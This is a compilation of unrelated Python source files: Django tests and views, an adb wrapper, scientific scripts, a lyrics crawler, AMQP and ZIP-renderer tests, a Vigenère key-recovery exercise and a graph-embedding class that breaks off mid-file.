class TestCchqPrbacBootstrap(TestCase):
"""
Tests the PRBAC bootstrap with and without --dry-run
"""
def test_dry_run(self):
"""
When --dry-run is passed, no models should be created
"""
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
command = cchq_prbac_bootstrap.Command()
command.handle(dry_run=True)
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
def test_non_dry_run(self):
"""
When there is no --dry-run passed, it defaults to false, and
things happen. Furthermore, the thing should be idempotent
"""
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
command = cchq_prbac_bootstrap.Command()
command.handle(dry_run=False)
# Just make sure something happened
self.assertGreater(Role.objects.count(), 10)
self.assertGreater(Grant.objects.count(), 10)
role_count = Role.objects.count()
grant_count = Grant.objects.count()
command.handle(dry_run=False)
self.assertEquals(Role.objects.count(), role_count)
self.assertEquals(Grant.objects.count(), grant_count)
class TestPillowTopFiltering(SimpleTestCase):
"""
Tests the function that excludes certain pillows from running on staging.
"""
def setUp(self):
self.pillowtops = {
'core': [
'corehq.pillows.case.CasePillow',
'corehq.pillows.xform.XFormPillow',
'corehq.pillows.domain.DomainPillow',
'corehq.pillows.user.UserPillow',
'corehq.pillows.application.AppPillow',
'corehq.pillows.group.GroupPillow',
'corehq.pillows.sms.SMSPillow',
'corehq.pillows.user.GroupToUserPillow',
'corehq.pillows.user.UnknownUsersPillow',
'corehq.pillows.sofabed.FormDataPillow',
'corehq.pillows.sofabed.CaseDataPillow',
],
'phonelog': [
'corehq.pillows.log.PhoneLogPillow',
],
}
def test_no_blacklist_items(self):
expected_pillows = {u'corehq.pillows.case.CasePillow',
u'corehq.pillows.xform.XFormPillow',
u'corehq.pillows.domain.DomainPillow',
u'corehq.pillows.user.UserPillow',
u'corehq.pillows.application.AppPillow',
u'corehq.pillows.group.GroupPillow',
u'corehq.pillows.sms.SMSPillow',
u'corehq.pillows.user.GroupToUserPillow',
u'corehq.pillows.user.UnknownUsersPillow',
u'corehq.pillows.sofabed.FormDataPillow',
u'corehq.pillows.sofabed.CaseDataPillow',
u'corehq.pillows.log.PhoneLogPillow'}
self.assertEqual(expected_pillows, apply_pillow_actions_to_pillows(
[], self.pillowtops))
def test_with_blacklist_items(self):
expected_pillows = {u'corehq.pillows.case.CasePillow',
u'corehq.pillows.xform.XFormPillow',
u'corehq.pillows.domain.DomainPillow',
u'corehq.pillows.user.UserPillow',
u'corehq.pillows.application.AppPillow',
u'corehq.pillows.group.GroupPillow',
u'corehq.pillows.sms.SMSPillow',
u'corehq.pillows.user.GroupToUserPillow',
u'corehq.pillows.user.UnknownUsersPillow',
u'corehq.pillows.sofabed.FormDataPillow',
u'corehq.pillows.sofabed.CaseDataPillow'}
self.assertEqual(expected_pillows, apply_pillow_actions_to_pillows(
[{'exclude_groups': ['phonelog']}], self.pillowtops))
def test_loading_existing_conf_file(self):
expected_action = {'include_groups': ['mvp']}
action = get_single_pillow_action('staging')
self.assertEqual(action.to_json(), expected_action)
def test_loading_no_existing_conf_file(self):
action = get_single_pillow_action('foo')
self.assertIsNone(action)
def test_india_server_exclusions(self):
self.pillowtops['fluff'] = [
'custom.bihar.models.CareBiharFluffPillow',
'custom.opm.models.OpmCaseFluffPillow',
'custom.opm.models.OpmUserFluffPillow',
]
pillows = get_pillows_for_env('india', self.pillowtops)
self.assertNotIn('custom.opm.models.OpmCaseFluffPillow', pillows)
self.assertNotIn('custom.opm.models.OpmUserFluffPillow', pillows)
self.assertIn('custom.bihar.models.CareBiharFluffPillow', pillows)
|
# coding=utf-8
import re
import os
import platform
import subprocess
import signal
import time
class Util(object):
def __init__(self, sn):
self.sn = sn
self.debug = False
if sn is None:
self.sn = self.__get_sn()
def __get_sn(self):
out = self.cmd('adb devices').strip()
out = re.split(r'[\r\n]+', out)
for line in out[1:]:
if not line.strip():
continue
if 'offline' in line:
print(line)
continue
sn, _ = re.split(r'\s+', line, maxsplit=1)
return sn
        raise NameError('No device connected')
def cmd(self, arg, timeout=30, is_async=False):
"""
执行命令,并返回命令的输出,有超时可以设置
:param arg:
:param timeout:
:return:
"""
is_linux = platform.system() == 'Linux'
start = time.time()
        out = []  # collected output lines
if self.debug:
print(arg)
p = subprocess.Popen(arg, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True,
preexec_fn=os.setsid if is_linux else None)
        if is_async:  # asynchronous execution: return the Popen object immediately
return p
while True:
            out_line = p.stdout.readline().decode('utf-8').strip()  # single line of output
            out.append(out_line)  # store the line in the output list
if p.poll() is not None:
break
seconds_passed = time.time() - start
if timeout and seconds_passed > timeout:
if is_linux:
os.killpg(p.pid, signal.SIGTERM)
else:
p.terminate()
raise TimeoutError(arg, timeout)
        out = list(filter(None, out))  # filter out empty lines
        out = '\n'.join(out)  # join the lines into a single string
# print('time:{}, cmd:{}'.format(time.time() - start, arg))
return out
def adb(self, arg, timeout=30, is_async=False):
arg = 'adb -s {} {}'.format(self.sn, arg)
return self.cmd(arg, timeout, is_async)
def shell(self, arg, timeout=30, is_async=False):
arg = 'shell {}'.format(arg)
return self.adb(arg, timeout, is_async)
def cmd_out_save(self, arg, pc_path, mode='a'):
"""
将命令的输出保存到文件
:param arg: 命令
:param pc_path: 保存路径
:param mode: 保存模式,默认是追加
:return:
"""
with open(pc_path, mode) as f:
subprocess.call(arg, stdout=f)
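
# Usage sketch (illustrative; assumes adb is on the PATH and a device is attached):
#   u = Util(None)                               # auto-detects the first connected serial
#   print(u.shell('getprop ro.product.model'))   # run a shell command on the device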
|
"""
Utilities for the :mod:`dicom_parser.utils.siemens.csa` module.
"""
# DICOM VR code to Python type
VR_TO_TYPE = {
"FL": float, # float
"FD": float, # double
"DS": float, # decimal string
"SS": int, # signed short
"US": int, # unsigned short
"SL": int, # signed long
"UL": int, # unsigned long
"IS": int, # integer string
}
ENCODING: str = "latin-1"
NULL: bytes = b"\x00"
def strip_to_null(string):
"""
Strip string to first null.
Parameters
----------
s : bytes
Returns
-------
sdash : str
s stripped to first occurrence of null (0)
"""
zero_position = string.find(NULL)
if zero_position == -1:
return string
return string[:zero_position].decode(ENCODING)
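
# Minimal usage sketch (illustrative, not part of the original module):
def _example_strip_to_null():
    raw = b"SIEMENS\x00\x00\x00"  # null-padded CSA header value
    assert strip_to_null(raw) == "SIEMENS"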
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 Johannes Reiff
# SPDX-License-Identifier: MIT
"""
Implementation of the LiCN ⇌ LiNC isomerization potential surface.
This code is based on:
* R. Essers, J. Tennyson, and P. E. S. Wormer,
“An SCF potential energy surface for lithium cyanide,”
Chem. Phys. Lett. 89, 223–227 (1982),
doi:10.1016/0009-2614(82)80046-8.
* J. Tennyson,
“LiCN/LiNC potential surface procedure,”
Private communication.
Significant parameter deviations between these sources are marked with “!!!”.
"""
import operator
import sys
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize
import scipy.special
# Multipole moments <Q_L,0> for the electrostatic energy.
MOMENT_Q = [-1.00, -0.215135, -3.414573, -3.818815, -15.84152, -14.29374, -43.81719]
# Induction energy coefficients C_l1,l2,L.
# Format: (l1, l2): {L: C_l1,l2,L}
# Some parameters include a factor 2 to account for C_l1,l2,L = C_l2,l1,L.
INDUCION_COEFFS = {
(1, 1): {0: -10.5271, 2: -3.17},
(2, 1): {1: -20.62328, 3: 3.7320800}, # !!! 4.06 vs 3.7320800
(2, 2): {0: -57.49396, 2: -106.8192, 4: 17.14139}, # includes (3, 1)
(3, 2): {1: -202.8972, 3: -75.23207, 5: -28.45514},
(3, 3): {0: -458.2015, 2: -353.7347, 4: -112.6427, 6: -108.2786},
}
# Damping fit parameters.
DAMPING_R0 = 1.900781
DAMPING_A = 1.515625
# Short-range fit parameters A_L, B_L, and C_L.
SHORT_RNG_PARAMS = [
# A_L B_L C_L
(-1.3832116, +0.14000706, +0.2078921600),
(-2.9579132, +1.47977160, -0.0116130820),
(-4.7420297, +1.81198620, -0.0171806800), # !!! 0.017818 vs 0.0171806800
(-1.8885299, +1.28750300, +0.0277284910),
(-4.4143354, +2.32297140, -0.0706927420),
(-4.0256496, +2.77538320, -0.1377197800),
(-5.8425899, +3.48085290, -0.1863111400),
(-2.6168114, +2.65559520, -0.0058815504),
(-6.3446579, +4.34498010, -0.1529136800),
(15.2022800, -6.54925370, +1.3025678000),
]
def main():
minmax_saddle = find_saddle_minmax()
gradroot_saddle = find_saddle_gradroot()
min_0, min_pi = find_minima()
print('MEP maximum:', minmax_saddle, '->', potential(*minmax_saddle))
print('grad V = 0:', gradroot_saddle, '->', potential(*gradroot_saddle))
print('min V(ϑ = 0):', min_0, '->', potential(*min_0))
print('min V(ϑ = π):', min_pi, '->', potential(*min_pi))
plot_potential(minmax_saddle, min_0, min_pi)
def find_saddle_minmax():
"""Calculate saddle position via a maximum along the minimum energy path."""
tol = 1e-8
mep = lambda theta: minimize(potential, 4.5, [float(theta)], tol=tol)
res = minimize(lambda theta: -mep(theta).fun, 0.8, tol=tol)
return mep(res.x[0]).x[0], res.x[0]
def find_saddle_gradroot():
"""Calculate saddle position via a root of the potential's gradient."""
eps = np.sqrt(np.finfo(float).eps)
pot = lambda pos: potential(*pos)
dpot = lambda pos: scipy.optimize.approx_fprime(pos, pot, eps)
res = scipy.optimize.root(dpot, (4.5, 0.8))
assert res.success
return tuple(res.x)
def find_minima():
"""Calculate minima corresponding to the LiCN and LiNC configurations."""
tol = 1e-8
pot = lambda pos: potential(*pos)
for theta in (0, np.pi):
yield tuple(minimize(pot, (4.5, theta), tol=tol).x)
def plot_potential(*points):
"""Show a 2D plot of the potential with markers."""
r = np.linspace(3.0, 5.5, 256)
theta = np.linspace(0.0, np.pi, 256)
mesh_r, mesh_theta = np.meshgrid(r, theta)
pot = potential(mesh_r, mesh_theta)
fig, ax = plt.subplots(constrained_layout=True)
ax.imshow(pot, extent=(r[0], r[-1], theta[0], theta[-1]), vmax=-0.12,
origin='lower', aspect='auto', interpolation='spline16')
levels = np.linspace(pot.min(), -0.20, 12)
ax.contour(mesh_r, mesh_theta, pot, levels, colors='w')
for point in points:
ax.plot(*point, marker='x', ms=10, color='tab:orange')
plt.show()
plt.close(fig)
def potential(r, theta):
"""Full potential V(R, ϑ)."""
legendre = [legendre_cos(l, theta) for l in range(len(SHORT_RNG_PARAMS))]
return (
(pot_electrostat(r, legendre) + pot_induction(r, legendre)) * damping(r)
+ pot_short_rng(r, legendre)
)
def pot_electrostat(r, legendre):
"""Electrostatic energy E_el(R, ϑ)."""
return sum(
r**(-l - 1) * q * legendre[l]
for l, q in enumerate(MOMENT_Q)
)
def pot_induction(r, legendre):
"""Induction energy E_ind(R, ϑ)."""
return sum(
r**(-2 - l1 - l2) * sum(c * legendre[l] for l, c in cl.items())
for (l1, l2), cl in INDUCION_COEFFS.items()
)
def pot_short_rng(r, legendre):
"""Short-range energy E_SR(R, ϑ)."""
return sum(map(operator.mul, short_rng_params(r), legendre))
def short_rng_params(r):
"""Short-range parameter D_L(R)."""
return (np.exp(-a - b * r - c * r**2) for a, b, c in SHORT_RNG_PARAMS)
def damping(r):
"""Damping function F(R)."""
return 1 - np.exp(-DAMPING_A * (r - DAMPING_R0)**2)
def legendre_cos(l, theta):
return scipy.special.eval_legendre(l, np.cos(theta))
def minimize(*args, **kwargs):
res = scipy.optimize.minimize(*args, **kwargs)
assert res.success
return res
if __name__ == '__main__':
sys.exit(int(main() or 0))
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
import csv
from django.contrib import messages
import time
import os
# forms
from analysis.forms import homeForm
from analysis.forms import selectForm
# backend file
from analysis.result_analysis import analysis_fun
# Create your views here.
# creates a result.csv file
def handle_uploaded_file(f, fname):
try:
with open('analysis/static/media/'+fname+'.csv', 'wb+') as writeFile:
#writer = csv.writer( writeFile , delimiter=',' )
for chunk in f.chunks():
writeFile.write(chunk)
print('File Created')
except Exception as e:
pass
# Home
def home(request):
if request.method == "POST":
form = homeForm(request.POST, request.FILES)
if form.is_valid():
request.session['fileName'] = str(time.time())
print(request.session['fileName'])
handle_uploaded_file(request.FILES['file'], request.session['fileName'])
#return HttpResponse("hi")
return redirect('/analysis/select')
        else:
            messages.error(request, 'Failed to validate')
    # render the form on GET requests and when validation fails
    return render(request, "home.html", {"homeForm":homeForm})
# Select
def getSubjectCode(fname):
print(fname)
try:
with open('analysis/static/media/'+fname+'.csv', 'r') as csvfile:
results = csv.reader(csvfile, delimiter=',')
subjectCode = next(results, None)
retSubCode = []
for s in subjectCode:
retSubCode.append((s, s))
return tuple(retSubCode)
except Exception as e:
print('File not found')
return ''
def select(request):
if request.method == "POST":
form = selectForm(request.POST)
#form = selectForm()
form.fields['subjectCode'].choices = getSubjectCode(request.session['fileName'])
if form.is_valid():
picked = form.cleaned_data.get('subjectCode')
#print(picked)
analysis_fun(request.session['fileName'], picked)
messages.success(request, 'File Analysis Successful')
else:
messages.error(request, 'Failed to validate')
return redirect('/analysis/home')
return redirect('/analysis/result')
else:
print(getSubjectCode(request.session['fileName']))
form = selectForm()
form.fields['subjectCode'].choices = getSubjectCode(request.session['fileName'])
try:
fileContent = []
with open('analysis/static/media/'+request.session['fileName']+'.csv', 'r') as readFile:
reader = csv.reader(readFile)
for row in reader:
fileContent.append(row)
except Exception as e:
pass
return render(request, "select.html", {"selectForm":form, "fileContent":fileContent})
# Result
def result(request):
if request.method == "POST":
try:
with open('analysis/static/media/analysis'+request.session['fileName']+'.csv', 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + 'analysis.csv'
os.remove('analysis/static/media/'+request.session['fileName']+'.csv')
os.remove('analysis/static/media/analysis'+request.session['fileName']+'.csv')
return response
#return redirect('/analysis/home')
except Exception as e:
messages.error(request, 'Failed to Download')
return redirect('/analysis/home')
else:
try:
fileContent = []
with open('analysis/static/media/analysis'+request.session['fileName']+'.csv', 'r') as readFile:
reader = csv.reader(readFile)
for row in reader:
fileContent.append(row)
except Exception as e:
pass
return render(request, "result.html", {"fileContent":fileContent})
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_mysql.models import JSONField, Model
from django.db import models
from cuestionarios.models import Preguntas_test, Grupo_edad
from alumnos.models import Alumno
class Respuesta(Model):
alumno = models.ForeignKey(Alumno,
on_delete=models.CASCADE, null=True, blank=True)
pregunta = models.ForeignKey(Preguntas_test,
on_delete=models.CASCADE)
respuesta = JSONField()
class Link(Model):
name = models.TextField(max_length=500, blank=False)
url = models.TextField(max_length=500, blank=False)
|
# -*- encoding: utf-8 -*-
"""Testing Unittest facilities offered.
This doesn't test 'wrap' command, but the 'self.w' provided to
tests inheriting BaseShTest.
"""
from .. import ShellError, BaseShTest
class WrapSimpleTest(BaseShTest):
def test_shell_call(self):
out = self.w("true")
self.assertEquals(out, "")
def test_full_bash_construct(self):
out = self.w("(false || true) && test -z "" > /dev/null")
self.assertEquals(out, "")
def test_fail(self):
self.assertRaises(ShellError, self.w, ("false", ))
class WrapEnvTest(BaseShTest):
DEFAULT_ENV = {"MYVALUE": "XYXY"}
def test_shell_env(self):
out = self.w("echo $MYVALUE")
self.assertEquals(out, "XYXY")
def test_shell_inherit_main_process_env(self):
import os
os.environ["MYVALUE2"] = "ABAB"
out = self.w("echo $MYVALUE2")
self.assertEquals(out, "ABAB")
|
from contextlib import closing
from mysql.connector import connect
import random
def create_journal_group_name_lookup(filepath, encoding, delimiter):
data = load_delimited_data(filepath, encoding, delimiter)
lookup = {}
for row in data:
nlm_id = row[0]
group = row[1]
lookup[nlm_id] = group
return lookup
def create_id_lookup(db_config, sql):
lookup = {}
with closing(connect(**db_config)) as conn:
with closing(conn.cursor()) as cursor: #pylint: disable=E1101
cursor.execute(sql) #pylint: disable=E1101
for row in cursor.fetchall(): #pylint: disable=E1101
id, ui = row
lookup[ui] = id
return lookup
def load_delimited_data(path, encoding, delimiter):
with open(path, 'rt', encoding=encoding) as file:
data = tuple( tuple(data_item.strip() for data_item in line.strip().split(delimiter)) for line in file )
return data
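# e.g. a line "123|Journal Name|A" read with delimiter='|' yields the row
# ('123', 'Journal Name', 'A') with surrounding whitespace stripped from every item.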
def load_ids_from_file(path, encoding):
ids = [int(id[0]) for id in load_delimited_data(path, encoding, ',')]
return ids
def load_indexing_periods(filepath, encoding, is_fully_indexed):
periods = {}
with open(filepath, 'rt', encoding=encoding) as file:
for line in file:
split = line.split(',')
nlm_id = split[0].strip()
citation_subset = split[1].strip()
start_year = int(split[2].strip())
end_year = int(split[3].strip())
if start_year < 0:
continue
if end_year < 0:
end_year = None
period = { 'citation_subset': citation_subset, 'is_fully_indexed': is_fully_indexed, 'start_year': start_year, 'end_year': end_year }
if nlm_id in periods:
periods[nlm_id].append(period)
else:
periods[nlm_id] = [period]
return periods
def random_permutation(iterable, r=None):
pool = tuple(iterable)
r = len(pool) if r is None else r
return tuple(random.sample(pool, r))
def save_delimited_data(path, encoding, delimiter, data):
with open(path, 'wt', encoding=encoding) as file:
for data_row in data:
line = delimiter.join([str(data_item) for data_item in data_row]) + '\n'
file.write(line)
def should_review_coverage_note(coverage_note_text):
coverage_note_text_lower = coverage_note_text.lower()
should_review = str('sel' in coverage_note_text_lower or 'ful' in coverage_note_text_lower)
return should_review
def write_ids_to_file(path, encoding, ids):
save_delimited_data(path, encoding, ',', [(id,) for id in ids])
|
def linha():
print('-=' * 30)
def area(a, b):
ar = a * b
    print(f'The area of a {a:.2f} x {b:.2f} plot of land is {ar:.2f}m²')
# Main function
linha()
print(' Land Plot Control')
linha()
larg = float(input('Width (m): '))
comp = float(input('Length (m): '))
area(larg, comp)
|
import pytest
from my_package import process
@pytest.mark.parametrize(
'name, expected',
[
['Hemingway, Ernest', 'Ernest Hemingway'],
['virginia woolf', 'Virginia Woolf'],
['charles dickens ', 'Charles Dickens'],
],
)
def test_clean_name(name, expected):
assert process.clean_name(name) == expected
|
import scrapy
import os
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
try:
from lyrics_crawler_single.constants import (
BASE_URL,
TOP_N,
MOST_ACCESSED,
OUTPUT_FILE,
)
except:
from constants import BASE_URL, TOP_N, MOST_ACCESSED, OUTPUT_FILE
class TopNLyricsSpider(scrapy.Spider):
name = "top_n_lyrics"
start_urls = [
os.path.join(BASE_URL, MOST_ACCESSED, "axe"),
os.path.join(BASE_URL, MOST_ACCESSED, "fado"),
os.path.join(BASE_URL, MOST_ACCESSED, "infantil"),
os.path.join(BASE_URL, MOST_ACCESSED, "mpb"),
os.path.join(BASE_URL, MOST_ACCESSED, "pagode"),
os.path.join(BASE_URL, MOST_ACCESSED, "poprock"),
os.path.join(BASE_URL, MOST_ACCESSED, "samba"),
os.path.join(BASE_URL, MOST_ACCESSED, "bossa-nova"),
]
def parse(self, response):
for lyrics_list in response.css("ol.top-list_mus"):
for _i, lyric in enumerate(lyrics_list.css('li a::attr("href")')):
with open(OUTPUT_FILE, "a") as f:
uri = lyric.get()
if uri[0] == "/":
uri = uri[1:]
f.write(f"{os.path.join(BASE_URL,uri)}\n")
if _i >= TOP_N:
break
|
#!/usr/bin/python3
# Knowing the ciphertext and the plaintext,
# we can recover the key of the Vigenère cipher,
# then use https://www.dcode.fr/vigenere-cipher
plaintext = "OrestisHackingforfunandprofit"
ciphertext = "PieagnmJkoijegnbwzwxmlegrwsnn"
key = ""
for i in range(len(plaintext)):
num_key = ((ord(ciphertext[i]) - ord(plaintext[i])) % 26) + 97
char_key = chr(num_key)
key = key + char_key
print(key)
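# Optional sanity check (a small illustrative sketch, not part of the original
# script): re-encrypting the plaintext with the recovered key should reproduce
# the ciphertext. This assumes the ciphertext preserves the plaintext's letter
# case, which holds for the strings above; encrypt_char is a hypothetical helper.
def encrypt_char(p_char, k_char):
    base = ord('A') if p_char.isupper() else ord('a')
    shift = ord(k_char) - ord('a')
    return chr((ord(p_char) - base + shift) % 26 + base)
check = "".join(encrypt_char(p, k) for p, k in zip(plaintext, key))
print(check == ciphertext)  # expected: True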
|
import pandas as pd
import dataconfig as cfg
import csv
from os import listdir
from os.path import isfile, join
def main():
    root_folder = cfg.data['watch_event_out_folder']
    filenames = [f for f in listdir(root_folder) if isfile(join(root_folder, f))]
    filenames = [join(root_folder, f) for f in filenames]
    # Ref: https://stackoverflow.com/questions/2512386/how-to-merge-200-csv-files-in-python
    combined_csv = pd.concat([pd.read_csv(f) for f in filenames])
    combined_csv.to_csv(join(root_folder, "combined_csv.csv"), index=False)
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
# coding:utf-8
class Solution:
    # Note in particular: find any one duplicated value and assign it to duplication[0].
    # The function returns True/False.
def duplicate(self, numbers, duplication):
table = set()
for num in numbers:
if num not in table:
table.add(num)
else:
duplication[0] = num
return True
return False
if __name__ == "__main__":
numbers = [2, 3, 1, 0, 2, 5, 3]
duplication = [0]
s = Solution()
ans = s.duplicate(numbers, duplication)
print(ans)
print(duplication[0])
|
import os
from setuptools import setup
f = open(os.path.join(os.path.dirname(__file__), 'README.md'))
readme = f.read()
f.close()
VERSION = "0.2.2"
setup(
name = "paizaio-api"
, version = VERSION
, author = "Takazumi Shirayanagi"
, author_email = "zumix.cpp@gmail.com"
, url = "https://github.com/srz-zumix/paizaio-api/"
, description = "A Python binding to the paiza.IO API."
, license = "MIT"
, platforms = ["any"]
, keywords = "API, paiza.IO, paizaio, paiza-io"
, packages = ['paizaio']
, long_description = readme
, classifiers = [
"Development Status :: 3 - Alpha"
, "Topic :: Utilities"
, "License :: OSI Approved :: MIT License"
]
, install_requires=['requests']
)
|
import os.path
import sys
sys.path = [os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'lib')] + sys.path
from amqpsfw import amqp_spec, ioloop
from amqpsfw.server.server import Server, ServerClient
from amqpsfw.client.client import Client
from amqpsfw.client.configuration import ClientConfiguration
from amqpsfw.server.configuration import ServerConfiguration
class TestServer:
def test_server_basic(self):
class ClientPublishAplication(Client):
def processor(self):
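                # Happy-path AMQP flow exercised by this test: open a channel,
                # enable flow, declare an exchange and a queue, bind them,
                # publish 100 messages, then close the channel and the connection.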
channel_number = 1
start = yield from super().processor()
ch_open1 = amqp_spec.Channel.Open(channel_number=1)
ch_open_ok = yield self.write(ch_open1)
flow = amqp_spec.Channel.Flow(channel_number=ch_open1.channel_number)
flow_ok = yield self.write(flow)
ex_declare = amqp_spec.Exchange.Declare('message', channel_number=ch_open1.channel_number)
declare_ok = yield self.write(ex_declare)
declare_q = amqp_spec.Queue.Declare(queue_name='text', channel_number=ch_open1.channel_number)
declare_q_ok = yield self.write(declare_q)
bind = amqp_spec.Queue.Bind(queue_name='text', exchange_name='message', routing_key='text.#', channel_number=ch_open1.channel_number)
bind_ok = yield self.write(bind)
yield self.sleep(3)
for t in range(100):
content = "qwe" + str(t)
response = yield self.write(amqp_spec.Basic.Publish(exchange_name='message', routing_key='text.tratata', channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Header(class_id=amqp_spec.Basic.Publish.class_id, body_size=len(content), header_properties={'content-type': 'application/json'}, channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Content(content=content, channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Channel.Close(channel_number=channel_number))
assert type(response) is amqp_spec.Channel.CloseOk
response = yield self.write(amqp_spec.Connection.Close())
assert type(response) is amqp_spec.Connection.CloseOk
yield self.stop()
io_loop = ioloop.IOLoop()
s_app = Server(io_loop)
c_app = ClientPublishAplication(io_loop)
c_app.config = ClientConfiguration()
s_app.config = ServerConfiguration()
c_app.config.port = 55555
s_app.config.port = 55555
s_app.start()
c_app.start()
io_loop.start()
|
# -*- coding: utf-8 -*-
import json
from flask_restful import Resource
from dashboard import r_kv
from ..utils import build_response
class KeyList(Resource):
"""
    Get the keys in the database.
    Return all keys that exist in the database and are used to store
    data for building tables and visualizations, i.e. the data shared
    by users in IPython.
Attributes:
"""
def get(self):
"""
Get key list in storage.
"""
keys = r_kv.keys()
keys.sort()
return build_response(dict(data=keys, code=200))
class Key(Resource):
"""
    Get the data of a key.
    Get all the data stored under a key. Both the Key and KeyList APIs
    still have much to implement in the future to become more usable,
    namely auto-completion for KeyList and fetching part of the data
    via a key for this API.
Attributes:
"""
def get(self, key):
"""
Get a key-value from storage according to the key name.
"""
data = r_kv.get(key)
# data = json.dumps(data) if isinstance(data, str) else data
# data = json.loads(data) if data else {}
return build_response(dict(data=data, code=200))
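# Hypothetical client-side usage of these resources (the URL rules are
# registered elsewhere in the app, so the '/keys' and '/keys/<name>' paths
# and the exact response shape below are assumptions, not the project's
# confirmed routes):
#
#   import requests
#   resp = requests.get('http://localhost:5000/keys')
#   print(resp.json())          # e.g. {'code': 200, 'data': ['key_a', 'key_b']}
#   resp = requests.get('http://localhost:5000/keys/key_a')
#   print(resp.json()['data'])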
|
import urllib
import zipfile
import csv
from django import test
from localground.apps.site.tests import Client, ModelMixin
from rest_framework import status
from StringIO import StringIO
from django.contrib.gis.geos import Point
from localground.apps.site.api.tests.renderer_tests import mixins
from localground.apps.site.api.renderers.zip_renderer import ZIPRenderer
from localground.apps.site import models
class ZipMediaMixin(mixins.MediaMixin):
def test_zip_is_valid(self):
for url in self.urls:
response = self.client_user.get(
url + '?format=zip&project_id={0}'.format(self.project.id)
)
data = StringIO(response.content)
# Check if the zip file is not corrupted
zip_file = zipfile.ZipFile(data, 'r')
# Read all the files in the zip and check their
# CRCs and file headers.
# Return the name of the first file with an error,
# or else return None.
valid_if_none = zip_file.testzip()
self.assertIsNone(valid_if_none)
zip_file.close()
def _all_media_files_present_in_zip_file(self, is_list=False):
for url in self.urls.keys():
expected_count = self.urls.get(url)
response = self.client_user.get(
url + '?format=zip&project_id={0}'.format(self.project.id)
)
data = StringIO(response.content)
zip_file = zipfile.ZipFile(data, 'r')
data = StringIO(zip_file.read('content.csv'))
reader = csv.DictReader(data)
# Check that all photo paths are in the zip file:
file_paths = ['content.csv']
num_rows = 0
for row in reader:
key = row.get('overlay_type')
if 'dataset_' in key and not is_list:
key = 'record'
num_rows += 1
file_path_columns = ZIPRenderer.PATH_FIELD_LOOKUP.get(key) \
or []
for file_path_column in file_path_columns:
for column_header in row:
# "endswith" handles nested file paths, for example
# when record objects reference photo objects
if column_header.endswith(file_path_column):
if row.get(column_header) != '':
file_paths.append(row.get(column_header))
self.assertSetEqual(set(file_paths), set(zip_file.namelist()))
self.assertEqual(num_rows, expected_count)
if file_path_columns is ZIPRenderer.URL_PATH_FIELDS:
self.assertTrue(num_rows > 4)
else:
# make sure that it found at least 2 file paths
# print url
# print zip_file.namelist()
# print file_path_columns
self.assertTrue(
len(zip_file.namelist()) >= (1 + len(file_path_columns))
)
class ZIPRendererListTest(ZipMediaMixin, test.TestCase, ModelMixin):
'''
    These tests exercise the ZIP renderer using the /api/0/photos/
    endpoint (though any other endpoint could be used).
'''
def setUp(self):
ModelMixin.setUp(self)
ZipMediaMixin.setUp(self)
        # just test data types that have media files (skip map images for now
        # because they're auto-processed):
self.urls = {
'/api/0/photos/': 2,
'/api/0/audio/': 2,
'/api/0/prints/': 2,
'/api/0/datasets/{}/data/'.format(self.record1.dataset.id): 8
}
def test_all_media_files_present_in_zip_file(self):
self._all_media_files_present_in_zip_file(is_list=True)
class ZIPRendererInstanceTest(ZipMediaMixin, test.TestCase, ModelMixin):
def setUp(self):
ModelMixin.setUp(self)
# ZipMediaMixin.setUp(self)
self.photo1 = self.create_photo_with_media(
name="f1", tags=self.tags1, point=self.point
)
self.photo2 = self.create_photo_with_media(
name="f2", tags=self.tags2, point=self.point
)
self.audio1 = self.create_audio_with_media(
name="f1", tags=self.tags1, point=self.point
)
self.audio2 = self.create_audio_with_media(
name="f2", tags=self.tags2, point=self.point
)
self.dataset = self.create_dataset_with_fields(
name="Class Dataset", num_fields=9
)
# self.dataset = models.Dataset.objects.get(id=self.dataset.id) # requery
self.record1 = self.insert_dataset_data_record(
dataset=self.dataset,
project=self.project,
geoJSON=mixins.point,
name='rec1'
)
self.urls = {
# 1 project + 2 photos + 2 audio + 1 record
'/api/0/projects/{0}/'.format(self.project.id): 1,
# 1 project + 2 photos + 2 audio (no records)
# '/api/0/datasets/{0}/data/{1}/'.format(
# self.dataset.id, self.record1.id): 5
'/api/0/datasets/{0}/data/{1}/'.format(
self.dataset.id, self.record1.id): 1
}
# def test_all_media_files_present_in_zip_file(self):
# self.create_relation(self.record1, self.photo1)
# self.create_relation(self.record1, self.photo2)
# self.create_relation(self.record1, self.audio1)
# self.create_relation(self.record1, self.audio2)
#
# file_path_columns = ZIPRenderer.URL_PATH_FIELDS
# self._all_media_files_present_in_zip_file(is_list=False)
|
from __future__ import division
from __future__ import print_function
import argparse
import time
import numpy as np
import scipy.sparse as sp
import torch
import pickle
from torch import optim
from load_graph_embedding import load_embedding
from graph_embedding_config import *
from vgae_model import GCNModelVAE
from vgae_utils import load_data, mask_test_edges, preprocess_graph, get_roc_score, loss_function
class VGAE(object):
def __init__(self, graph, embedding_path, configs):
self.graph = graph
self.embedding_path = embedding_path
self.seed = 42
self.epochs = 20
self.hidden1 = 512
self.hidden2 = 128
self.lr = 0.01
self.dropout = 0
self.adj, self.features = load_data(self.graph, configs)
self.n_nodes, self.feat_dim = self.features.shape
# Store original adjacency matrix (without diagonal entries) for later
self.adj_orig = self.adj
self.adj_orig = self.adj_orig - sp.dia_matrix((self.adj_orig.diagonal()[np.newaxis, :], [0]), shape=self.adj_orig.shape)
self.adj_orig.eliminate_zeros()
self.model = None
self.optimizer = None
def sample_graph(self):
r = mask_test_edges(self.adj)
f = open("{}VGAE_samples.pkl".format(self.embedding_path), 'wb')
pickle.dump(r, f)
f.close()
